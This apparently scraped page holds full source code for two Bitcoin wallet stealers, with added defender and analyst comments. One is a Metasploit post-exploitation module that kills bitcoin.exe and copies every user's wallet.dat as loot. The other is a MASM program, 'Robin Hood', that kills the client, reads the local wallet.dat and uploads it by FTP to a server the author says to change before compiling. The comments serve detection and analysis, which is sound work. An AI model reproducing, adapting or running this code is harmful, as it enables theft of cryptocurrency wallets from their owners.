http://dev.metasploit.com/redmine/projects/framework/repository/revisions/12993/entry/modules/post/windows/gather/bitcoin_jacker.rb

# $Id: bitcoin_jacker.rb 12993 2011-06-21 03:26:07Z hdm $

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'
require 'rex'


# Post module for a Windows Meterpreter session: walks the per-user profile
# directories, looks for <profile>\...\Bitcoin\wallet.dat, and stores each
# file it can read as loot in the framework database.
#
# Defender note: the order of operations on the host is (1) directory listing
# of the profiles root, (2) stat of each candidate wallet.dat, (3) termination
# of any process named bitcoin.exe, (4) a full read of the wallet file. An
# unexpected bitcoin.exe exit followed by a read of wallet.dat from a
# non-wallet process is the host-side trace this code produces.
class Metasploit3 < Msf::Post
  include Msf::Auxiliary::Report

  # Registers the module metadata with the framework.
  def initialize(info={})
    super(
      update_info(
        info,
        'Name' => 'Windows Gather Bitcoin wallet.dat',
        'Description' => %q{ This module downloads any Bitcoin wallet.dat files from the target system},
        'License' => MSF_LICENSE,
        'Author' => [ 'illwill '],
        'Version' => '$Revision: 12993 $',
        'Platform' => [ 'windows' ],
        'SessionTypes' => [ 'meterpreter' ]
      )
    )
  end

  # Entry point. Picks the profile root and the application-data sub-path from
  # the OS string reported by the session, collects the profile directories,
  # then checks each one for a wallet.
  def run
    print_status("Checking All Users For Bitcoin Wallet...")
    os = session.sys.config.sysinfo['OS']
    drive = session.fs.file.expand_path("%SystemDrive%")

    # Vista-era and later layouts use \Users and AppData\Roaming; anything
    # that does not match the pattern falls back to the XP-style layout.
    @appdata, profiles_root =
      if os =~ /Windows 7|Vista|2008/
        ['\\AppData\\Roaming\\', '\\Users']
      else
        ['\\Application Data\\', '\\Documents and Settings']
      end
    @users = drive + profiles_root

    get_users

    @userpaths.each { |profile_dir| jack_wallet(profile_dir) }
  end

  # Looks for a wallet under one profile directory and, if present, reads it
  # in full and records it with store_loot.
  #
  # path - profile directory, as built by get_users (ends with a backslash).
  #
  # A failed stat is treated as "no wallet here" and returns silently. Any
  # error during the read is reported with print_error; Interrupt is re-raised
  # so the operator can still abort the module.
  def jack_wallet(path)
    contents = ""
    filename = "#{path}#{@appdata}\\Bitcoin\\wallet.dat"
    wallet_stat = client.fs.file.stat(filename) rescue nil
    return unless wallet_stat

    print_status("Wallet Found At #{filename}")
    print_status(" Jackin their wallet...")

    # The client process is stopped before the file is read.
    kill_bitcoin

    begin
      wallet = session.fs.file.new(filename, "rb")
      contents << wallet.read until wallet.eof?
      store_loot("bitcoin.wallet", "application/octet-stream", session, contents, filename, "Bitcoin Wallet")
      print_status(" Wallet Jacked.")
    rescue ::Interrupt
      raise
    rescue ::Exception => e
      print_error("Failed to download #{filename}: #{e.class} #{e}")
    end
  end

  # Fills @userpaths with one "<profiles root>\<name>\" string per entry in
  # the profiles root, skipping ".", ".." and the shared/system entries named
  # in the pattern below.
  def get_users
    @userpaths = []
    skipped = /^(\.|\.\.|All Users|Default|Default User|Public|desktop.ini|LocalService|NetworkService)$/
    session.fs.dir.foreach(@users) do |entry|
      next if entry =~ skipped

      @userpaths << "#{@users}\\#{entry}\\"
    end
  end

  # Terminates every process whose image name is bitcoin.exe (compared
  # case-insensitively). A failed kill is ignored.
  def kill_bitcoin
    client.sys.process.get_processes().each do |proc_entry|
      next unless proc_entry['name'].downcase == "bitcoin.exe"

      print_status(" #{proc_entry['name']} Process Found...")
      print_status(" Killing Process ID #{proc_entry['pid']}...")
      session.sys.process.kill(proc_entry['pid']) rescue nil
    end
  end
end

http://forums.gothack.net/showthread.php?18-Bitcion-Stealer
http://illmob.org/Sources/RobinHood.html

; Robin Hood - BitCoin Jacker
; by [ill]will
; steal from the rich and give to the poor
; by dumping the wallet to "public" ftp
;
; Send Me Money if it makes you rich :D
; 14P9t8ceqRzvJ4KhMWnjKQ4TwcLxWwk7j4
; 'randomize' proc found somewhere on the net
; ftp.microsoft.com does not let you upload files
; so change the info and compile with MASM
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

include \masm32\include\masm32rt.inc
include \masm32\include\wininet.inc
includelib \masm32\lib\wininet.lib

; Prototypes for the four procedures defined later in this file.
FTPit PROTO :DWORD,:DWORD,:DWORD
KillMe PROTO :DWORD
Randomize PROTO
Random PROTO :DWORD
; TCP port passed to InternetConnect in FTPit.
ThePort equ 21

; Initialised data. The server, username and password are the author's
; placeholders: the file header says the listed server does not accept
; uploads and that these values are meant to be changed before building.
; Analyst note: every entry here is a plain NUL-terminated literal, so in an
; unpacked build the strings "bitcoin.exe", "%s-wallet.dat" and
; "%s\Bitcoin\wallet.dat" would presumably show up in a strings scan.
.data
ftpsite db "ftp.microsoft.com",0 ;change the server
Username db "anonymous",0 ;change the username
Password db "bitcoin@microsoft.com",0 ;change the password
; Image name compared against each running process in KillMe.
szTheVictim db "bitcoin.exe",0
; wsprintf format for the remote file name: <decimal number>-wallet.dat.
RandWallet db "%s-wallet.dat",0
; Name of the environment variable read at start.
AppData db "AppData",0
; wsprintf format for the local wallet path under that directory.
wallet db "%s\Bitcoin\wallet.dat",0
; State of the generator in Random; set from GetTickCount by Randomize.
random_seed dd ?
; Holds the value returned by Random.
res dd 0
; Format and buffer used to render that value as unsigned decimal text.
sFmt db '%u',0
sBuf db 10 dup(0)


; Uninitialised buffers: the environment variable value, the local wallet
; path and the remote file name. szBuffer is not referenced in the code shown.
.data?
buffer db MAX_PATH dup(?)
WalletPath db 256 dup(?)
WalletFTP db 256 dup(?)
szBuffer db 256 dup(?)
.code

; Program entry point. Runs once, top to bottom, and exits; none of the
; return values from the calls below are checked.
; Unlike the Metasploit module earlier on this page, only the AppData
; directory of the account running the program is examined.
; Analyst note: the externally visible sequence is a terminate request
; against bitcoin.exe, a read of <AppData>\Bitcoin\wallet.dat, and an outbound
; FTP session on port 21 storing a file named <number>-wallet.dat.
start:

invoke KillMe, addr szTheVictim ;kill the bitcoin process
invoke Randomize ;generate a random number
invoke Random,9999999
mov res,EAX
invoke wsprintf,ADDR sBuf,ADDR sFmt,res ;append it to our ftp upload filename
invoke wsprintf,addr WalletFTP,addr RandWallet, addr sBuf ;ex: 9586293-wallet.dat

invoke GetEnvironmentVariable, addr AppData, addr buffer, sizeof buffer ;get the %AppDATA% folder
invoke wsprintf,addr WalletPath,addr wallet, addr buffer ;append the bitcoin wallet

invoke FTPit, addr ftpsite, addr WalletPath,addr WalletFTP ; send that shit to a public ftp
invoke ExitProcess, 0



; FTPit - uploads one local file to an FTP server through WinINet.
;   FTPserver    - address of the NUL-terminated host name
;   lpszFile     - address of the local file path
;   lpRemoteFile - address of the name to store the file under
; Credentials come from the Username/Password globals and the port from
; ThePort. The transfer is binary and the connection is opened in passive
; mode. No return value from InternetOpen, InternetConnect or FtpPutFile is
; tested, so the procedure reaches the first ret whether or not the upload
; worked. InternetStatusCallback is declared but not used in the code shown.
FTPit PROC FTPserver:DWORD, lpszFile:DWORD, lpRemoteFile:DWORD
local hInternet:DWORD
local ftpHandle:DWORD
local context:DWORD
local InternetStatusCallback:DWORD
; INTERNET_OPEN_TYPE_PRECONFIG: use the proxy/direct settings already
; configured on the machine.
invoke InternetOpen,NULL,INTERNET_OPEN_TYPE_PRECONFIG,NULL,NULL,0
mov hInternet, eax
; NOTE(review): the inline comment on the next line still mentions
; INTERNET_DEFAULT_FTP_PORT, but the call passes the ThePort constant.
invoke InternetConnect,hInternet,FTPserver,ThePort ,\ ;if different port change INTERNET_DEFAULT_FTP_PORT to port #
ADDR Username,ADDR Password,INTERNET_SERVICE_FTP,\
INTERNET_FLAG_PASSIVE,ADDR context
mov ftpHandle,eax
invoke FtpPutFile,ftpHandle,lpszFile,lpRemoteFile,FTP_TRANSFER_TYPE_BINARY,NULL
invoke InternetCloseHandle,ftpHandle
invoke InternetCloseHandle, hInternet
ret
; Nothing in the code shown jumps to this label, so the two lines below are
; not reached. GetErrDescription is not declared anywhere on this page.
err:
invoke GetErrDescription,eax
ret
FTPit endp



; Random - returns a pseudo-random value in eax, scaled to 0 .. dwBase-1.
;   dwBase - exclusive upper bound of the result
; Advances random_seed with one multiply-and-increment step
; (seed = seed * 08088405h + 1, truncated to 32 bits), then takes the high
; dword of dwBase * seed as the result.
; Analyst note: the seed comes from GetTickCount (see Randomize), so the
; number in the uploaded file name is derived from the tick count at launch
; rather than from a cryptographic source.
Random proc dwBase:dword
; ebx is saved, zeroed and restored but plays no part in the calculation.
push ebx
mov eax,dwBase
xor ebx,ebx
; edx = random_seed * 08088405h (low 32 bits), then + 1; stored as new seed.
imul edx,random_seed,08088405h
inc edx
mov random_seed,edx
; edx:eax = dwBase * new seed; the high half in edx is the scaled result.
mul edx
mov eax,edx
pop ebx
ret
Random endp

; Randomize - seeds the generator used by Random.
; Stores the value returned by GetTickCount in random_seed. Takes no
; arguments; eax still holds the tick count on return.
Randomize proc
invoke GetTickCount
mov random_seed,eax
ret
Randomize endp

; KillMe - requests termination of every running process whose executable
; name equals szFile, compared case-insensitively.
;   szFile - address of the NUL-terminated image name to match
; Walks a Toolhelp process snapshot from first entry to last. The results of
; CreateToolhelp32Snapshot, Process32First, OpenProcess and TerminateProcess
; are not checked. esi holds the snapshot handle for the whole walk.
; Analyst note: the host-side trace is a process-list snapshot followed by
; OpenProcess with only the terminate right against the matching process.
KillMe proc szFile:dword
LOCAL Process:PROCESSENTRY32

; dwSize must be filled in before the structure is passed to Process32First.
mov Process.dwSize, sizeof Process
; Flag value 2 is TH32CS_SNAPPROCESS: snapshot of all processes.
invoke CreateToolhelp32Snapshot, 2, 0
mov esi, eax
invoke Process32First, esi, addr Process
@@loop:
; lstrcmpiA returns 0 on a match; any other result skips to the next entry.
invoke lstrcmpiA,szFile, addr Process.szExeFile
test eax, eax
jnz @@continue
; Access mask 0001h is PROCESS_TERMINATE; the process is ended with exit code 0.
invoke OpenProcess, 0001h, 0, Process.th32ProcessID
invoke TerminateProcess, eax, 0
@@continue:
; Process32Next returns 0 when there are no further entries.
invoke Process32Next, esi, addr Process
test eax, eax
jz @@done
jmp @@loop
@@done:
invoke CloseHandle, esi
ret
KillMe endp


end start


IMSIDE7ADE1ED317F5048EB80799AB02FAC8C3391FD46